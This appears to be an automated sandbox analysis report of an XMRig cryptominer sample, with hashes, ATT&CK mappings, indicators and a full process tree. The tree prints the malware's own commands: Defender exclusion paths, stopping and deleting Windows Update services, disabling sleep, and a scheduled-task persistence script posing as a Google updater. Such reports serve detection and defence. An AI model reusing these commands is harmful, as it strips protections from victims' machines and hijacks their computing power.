xmrig | 002edc4950b4061601b6a3cae0a96e53a5240363e829994201ddb16d75164e49

Analysis

max time kernel
300s
max time network
290s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
18/09/2022, 04:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

m.exe
Size

7.1MB
MD5

42d928794fbc1463e0784538eeade8e9
SHA1

0f310ef2304c5489cc5f40b2e45bf15b409cd189
SHA256

002edc4950b4061601b6a3cae0a96e53a5240363e829994201ddb16d75164e49
SHA512

7789d977b247ab3d38c933d0f556389ff1357b113901c19822b51af8c75189ffcdecd3c685252d987ce44413e7df4a24d682836852ade1a4a97240c5d4c05811
SSDEEP

196608:iNv4hJZHZ+tHLVyMn1eXztjlMPSs5vABXaMo2fx1LMhokP:2v4hJOh8MgXZjESV3fx1LMukP

Score

10^/10

xmrig evasion miner themida trojan upx

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	m.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/memory/1988-162-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1988-166-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	m.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

Executes dropped EXE 1 IoCs

pid	Process
820	updater.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1988-162-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1988-166-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	m.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	m.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe

Loads dropped DLL 1 IoCs

pid	Process
952	taskeng.exe

Themida packer 20 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/1736-54-0x000000013F280000-0x000000013FF74000-memory.dmp	themida
behavioral1/memory/1736-55-0x000000013F280000-0x000000013FF74000-memory.dmp	themida
behavioral1/memory/1736-56-0x000000013F280000-0x000000013FF74000-memory.dmp	themida
behavioral1/memory/1736-57-0x000000013F280000-0x000000013FF74000-memory.dmp	themida
behavioral1/memory/1736-59-0x000000013F280000-0x000000013FF74000-memory.dmp	themida
behavioral1/memory/1736-60-0x000000013F280000-0x000000013FF74000-memory.dmp	themida
behavioral1/memory/1736-61-0x000000013F280000-0x000000013FF74000-memory.dmp	themida
behavioral1/memory/1736-66-0x000000013F280000-0x000000013FF74000-memory.dmp	themida
behavioral1/memory/1736-99-0x000000013F280000-0x000000013FF74000-memory.dmp	themida
behavioral1/files/0x000d0000000122ff-109.dat	themida
behavioral1/files/0x000d0000000122ff-111.dat	themida
behavioral1/memory/820-112-0x000000013F6F0000-0x00000001403E4000-memory.dmp	themida
behavioral1/memory/820-115-0x000000013F6F0000-0x00000001403E4000-memory.dmp	themida
behavioral1/memory/820-116-0x000000013F6F0000-0x00000001403E4000-memory.dmp	themida
behavioral1/memory/820-117-0x000000013F6F0000-0x00000001403E4000-memory.dmp	themida
behavioral1/memory/820-118-0x000000013F6F0000-0x00000001403E4000-memory.dmp	themida
behavioral1/memory/820-119-0x000000013F6F0000-0x00000001403E4000-memory.dmp	themida
behavioral1/memory/820-124-0x000000013F6F0000-0x00000001403E4000-memory.dmp	themida
behavioral1/memory/820-161-0x000000013F6F0000-0x00000001403E4000-memory.dmp	themida
behavioral1/files/0x000d0000000122ff-165.dat	themida

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	m.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1736	m.exe
820	updater.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 820 set thread context of 1728	820	updater.exe	76
PID 820 set thread context of 1988	820	updater.exe	85

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Chrome\updater.exe	m.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1776	sc.exe
2012	sc.exe
1380	sc.exe
1648	sc.exe
1852	sc.exe
524	sc.exe
1388	sc.exe
304	sc.exe
1564	sc.exe
1184	sc.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1568	schtasks.exe
1652	schtasks.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d046df1c29cbd801	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1908	powershell.exe
1708	powershell.exe
588	powershell.exe
1176	powershell.exe
1600	powershell.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe
1988	conhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
464	Process not Found

Suspicious use of AdjustPrivilegeToken 38 IoCs

description	pid	Process
Token: SeDebugPrivilege	1908	powershell.exe
Token: SeShutdownPrivilege	1000	powercfg.exe
Token: SeShutdownPrivilege	576	powercfg.exe
Token: SeShutdownPrivilege	1776	powercfg.exe
Token: SeDebugPrivilege	1708	powershell.exe
Token: SeShutdownPrivilege	1380	powercfg.exe
Token: SeDebugPrivilege	588	powershell.exe
Token: SeDebugPrivilege	1176	powershell.exe
Token: SeDebugPrivilege	1600	powershell.exe
Token: SeShutdownPrivilege	764	powercfg.exe
Token: SeShutdownPrivilege	1668	powercfg.exe
Token: SeShutdownPrivilege	1984	powercfg.exe
Token: SeShutdownPrivilege	1960	powercfg.exe
Token: SeAssignPrimaryTokenPrivilege	1956	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1956	WMIC.exe
Token: SeSecurityPrivilege	1956	WMIC.exe
Token: SeTakeOwnershipPrivilege	1956	WMIC.exe
Token: SeLoadDriverPrivilege	1956	WMIC.exe
Token: SeSystemtimePrivilege	1956	WMIC.exe
Token: SeBackupPrivilege	1956	WMIC.exe
Token: SeRestorePrivilege	1956	WMIC.exe
Token: SeShutdownPrivilege	1956	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1956	WMIC.exe
Token: SeUndockPrivilege	1956	WMIC.exe
Token: SeManageVolumePrivilege	1956	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1956	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1956	WMIC.exe
Token: SeSecurityPrivilege	1956	WMIC.exe
Token: SeTakeOwnershipPrivilege	1956	WMIC.exe
Token: SeLoadDriverPrivilege	1956	WMIC.exe
Token: SeSystemtimePrivilege	1956	WMIC.exe
Token: SeBackupPrivilege	1956	WMIC.exe
Token: SeRestorePrivilege	1956	WMIC.exe
Token: SeShutdownPrivilege	1956	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1956	WMIC.exe
Token: SeUndockPrivilege	1956	WMIC.exe
Token: SeManageVolumePrivilege	1956	WMIC.exe
Token: SeLockMemoryPrivilege	1988	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1736 wrote to memory of 1908	1736	m.exe	28
PID 1736 wrote to memory of 1908	1736	m.exe	28
PID 1736 wrote to memory of 1908	1736	m.exe	28
PID 1736 wrote to memory of 516	1736	m.exe	30
PID 1736 wrote to memory of 516	1736	m.exe	30
PID 1736 wrote to memory of 516	1736	m.exe	30
PID 1736 wrote to memory of 772	1736	m.exe	31
PID 1736 wrote to memory of 772	1736	m.exe	31
PID 1736 wrote to memory of 772	1736	m.exe	31
PID 1736 wrote to memory of 1708	1736	m.exe	33
PID 1736 wrote to memory of 1708	1736	m.exe	33
PID 1736 wrote to memory of 1708	1736	m.exe	33
PID 516 wrote to memory of 1564	516	cmd.exe	35
PID 516 wrote to memory of 1564	516	cmd.exe	35
PID 516 wrote to memory of 1564	516	cmd.exe	35
PID 772 wrote to memory of 1000	772	cmd.exe	37
PID 772 wrote to memory of 1000	772	cmd.exe	37
PID 772 wrote to memory of 1000	772	cmd.exe	37
PID 516 wrote to memory of 1184	516	cmd.exe	38
PID 516 wrote to memory of 1184	516	cmd.exe	38
PID 516 wrote to memory of 1184	516	cmd.exe	38
PID 516 wrote to memory of 1852	516	cmd.exe	39
PID 516 wrote to memory of 1852	516	cmd.exe	39
PID 516 wrote to memory of 1852	516	cmd.exe	39
PID 772 wrote to memory of 576	772	cmd.exe	40
PID 772 wrote to memory of 576	772	cmd.exe	40
PID 772 wrote to memory of 576	772	cmd.exe	40
PID 516 wrote to memory of 1388	516	cmd.exe	41
PID 516 wrote to memory of 1388	516	cmd.exe	41
PID 516 wrote to memory of 1388	516	cmd.exe	41
PID 772 wrote to memory of 1776	772	cmd.exe	42
PID 772 wrote to memory of 1776	772	cmd.exe	42
PID 772 wrote to memory of 1776	772	cmd.exe	42
PID 516 wrote to memory of 524	516	cmd.exe	43
PID 516 wrote to memory of 524	516	cmd.exe	43
PID 516 wrote to memory of 524	516	cmd.exe	43
PID 772 wrote to memory of 1380	772	cmd.exe	44
PID 772 wrote to memory of 1380	772	cmd.exe	44
PID 772 wrote to memory of 1380	772	cmd.exe	44
PID 516 wrote to memory of 2012	516	cmd.exe	46
PID 516 wrote to memory of 2012	516	cmd.exe	46
PID 516 wrote to memory of 2012	516	cmd.exe	46
PID 516 wrote to memory of 1796	516	cmd.exe	45
PID 516 wrote to memory of 1796	516	cmd.exe	45
PID 516 wrote to memory of 1796	516	cmd.exe	45
PID 516 wrote to memory of 960	516	cmd.exe	47
PID 516 wrote to memory of 960	516	cmd.exe	47
PID 516 wrote to memory of 960	516	cmd.exe	47
PID 516 wrote to memory of 1648	516	cmd.exe	48
PID 516 wrote to memory of 1648	516	cmd.exe	48
PID 516 wrote to memory of 1648	516	cmd.exe	48
PID 1708 wrote to memory of 1568	1708	powershell.exe	49
PID 1708 wrote to memory of 1568	1708	powershell.exe	49
PID 1708 wrote to memory of 1568	1708	powershell.exe	49
PID 516 wrote to memory of 1584	516	cmd.exe	50
PID 516 wrote to memory of 1584	516	cmd.exe	50
PID 516 wrote to memory of 1584	516	cmd.exe	50
PID 1736 wrote to memory of 588	1736	m.exe	51
PID 1736 wrote to memory of 588	1736	m.exe	51
PID 1736 wrote to memory of 588	1736	m.exe	51
PID 588 wrote to memory of 1632	588	powershell.exe	53
PID 588 wrote to memory of 1632	588	powershell.exe	53
PID 588 wrote to memory of 1632	588	powershell.exe	53
PID 952 wrote to memory of 820	952	taskeng.exe	55

C:\Users\Admin\AppData\Local\Temp\m.exe
"C:\Users\Admin\AppData\Local\Temp\m.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1736
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1908
- C:\Windows\system32\cmd.exe
  cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:516
- - C:\Windows\system32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1564
- - C:\Windows\system32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1184
- - C:\Windows\system32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1852
- - C:\Windows\system32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1388
- - C:\Windows\system32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:524
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:1796
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:2012
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:960
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:1648
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:1584
- C:\Windows\system32\cmd.exe
  cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:772
- - C:\Windows\system32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1000
- - C:\Windows\system32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:576
- - C:\Windows\system32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1776
- - C:\Windows\system32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1380
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell <#kluzksciw#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1708
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:1568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell <#okjqsrucq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:588
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:1632

C:\Windows\system32\taskeng.exe
taskeng.exe {B22488B7-5A8F-4C04-B16F-5BDFAB68C106} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:952
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  PID:820
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    3⤵
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1176
- - C:\Windows\system32\cmd.exe
    cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:604
  - - C:\Windows\system32\sc.exe
      sc stop UsoSvc
      4⤵
      Launches sc.exe
      PID:1776
  - - C:\Windows\system32\sc.exe
      sc stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:2012
  - - C:\Windows\system32\sc.exe
      sc stop wuauserv
      4⤵
      Launches sc.exe
      PID:1380
  - - C:\Windows\system32\sc.exe
      sc stop bits
      4⤵
      Launches sc.exe
      PID:304
  - - C:\Windows\system32\sc.exe
      sc stop dosvc
      4⤵
      Launches sc.exe
      PID:1648
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
      4⤵
      PID:964
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
      4⤵
      PID:1672
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
      4⤵
      PID:516
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
      4⤵
      PID:828
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      PID:976
- - C:\Windows\system32\cmd.exe
    cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    3⤵
    PID:1100
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:764
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1668
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1984
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1960
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell <#kluzksciw#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1600
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
      4⤵
      Creates scheduled task(s)
      PID:1652
- - C:\Windows\system32\conhost.exe
    C:\Windows\system32\conhost.exe gmuismsnhhoket
    3⤵
    PID:1728
  - - C:\Windows\system32\cmd.exe
      cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
      4⤵
      Drops file in Program Files directory
      PID:1628
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Name, VideoProcessor
        5⤵
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:1956
- - C:\Windows\system32\cmd.exe
    cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    3⤵
    - Drops file in Program Files directory
    PID:2016
- - C:\Windows\system32\conhost.exe
    C:\Windows\system32\conhost.exe cqprjbqhaxyoqwca GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1mieaUmds+bQUd9kbDCiaVSLOanLtXss/zViMWvtgoO3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1988

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
7.1MB

MD5
31089351b264b9b94b684cda9c4dabd4

SHA1
989fee7a30f135ecc4aed46f81c56065de579a7d

SHA256
520921b18647c7f20d20da0cb1d3f55fd87af94f587c6daee1b71a0d6432e884

SHA512
ae05e6ce2aeb9e4fd9add598560fafaba7fdb18a6db71156e77f26dbb0c96d21e703731b0f5e722ae8e01755408941eb9364d91214c1e07997cd451917d94b83

Download Submit
C:\Program Files\Google\Chrome\updater.exe

Filesize
7.1MB

MD5
31089351b264b9b94b684cda9c4dabd4

SHA1
989fee7a30f135ecc4aed46f81c56065de579a7d

SHA256
520921b18647c7f20d20da0cb1d3f55fd87af94f587c6daee1b71a0d6432e884

SHA512
ae05e6ce2aeb9e4fd9add598560fafaba7fdb18a6db71156e77f26dbb0c96d21e703731b0f5e722ae8e01755408941eb9364d91214c1e07997cd451917d94b83

Download Submit
C:\Program Files\Google\Libs\g.log

Filesize
198B

MD5
37dd19b2be4fa7635ad6a2f3238c4af1

SHA1
e5b2c034636b434faee84e82e3bce3a3d3561943

SHA256
8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

SHA512
86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
303335a17c709dbd7ff6ffc9d1cde942

SHA1
42c7d1f3b927820820724731c8be9a0fdac8c084

SHA256
5f673498a7c58939cb55f6afa0cf2f87e952d7abdfa4fc42696f470909a807a3

SHA512
b306752b6889fdad53137e5e69ef2d43708bfffd79361b1e1b2979f3b440a1c2ff8665c5c4e24f9c5b1899875ea3a871eaecb74c67d524381363ad2439eafbb2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
303335a17c709dbd7ff6ffc9d1cde942

SHA1
42c7d1f3b927820820724731c8be9a0fdac8c084

SHA256
5f673498a7c58939cb55f6afa0cf2f87e952d7abdfa4fc42696f470909a807a3

SHA512
b306752b6889fdad53137e5e69ef2d43708bfffd79361b1e1b2979f3b440a1c2ff8665c5c4e24f9c5b1899875ea3a871eaecb74c67d524381363ad2439eafbb2

Download Submit
